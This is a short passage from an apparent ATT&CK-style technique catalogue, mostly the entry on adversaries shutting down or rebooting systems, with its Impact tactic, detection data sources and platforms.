Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre